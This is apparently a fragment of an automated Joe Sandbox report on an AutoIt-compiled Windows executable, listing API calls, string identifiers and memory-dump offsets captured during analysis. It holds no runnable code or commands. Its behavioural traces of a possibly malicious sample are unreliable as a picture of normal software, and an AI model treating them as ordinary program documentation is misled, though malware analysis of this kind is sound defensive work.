                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00235475
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                                                  • String ID: <local>
                                                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00214557
                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 0021463E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                  • String ID: (*
                                                                                                                                                                  • API String ID: 3761405300-2802481617
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: htonsinet_addr
                                                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0021C5E5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                                                                  • String ID: EA06
                                                                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 0021C4E1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 0021C562
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                                                  • String ID: #32770
                                                                                                                                                                  APIs
                                                                                                                                                                  • __umatherr.LIBCMT ref: 0020DA2A
                                                                                                                                                                    • Part of subcall function 0020DD86: __ctrlfp.LIBCMT ref: 0020DDE5
                                                                                                                                                                  • __ctrlfp.LIBCMT ref: 0020DA47
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __ctrlfp$__umatherr
                                                                                                                                                                  • String ID: xn%
                                                                                                                                                                  APIs
                                                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0021B36B
                                                                                                                                                                    • Part of subcall function 00202011: _doexit.LIBCMT ref: 0020201B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message_doexit
                                                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 0025BAB8
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0025BCAB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                                  • String ID: WIN_XPe
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0024849F
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002484B2
                                                                                                                                                                    • Part of subcall function 00228355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002283CD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002484DF
                                                                                                                                                                  • PostMessageW.USER32(00000000), ref: 002484E6
                                                                                                                                                                    • Part of subcall function 00228355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002283CD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0022D01E
                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0022D035
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                                                  • String ID: aut
                                                                                                                                                                  • API String ID: 3285503233-3010740371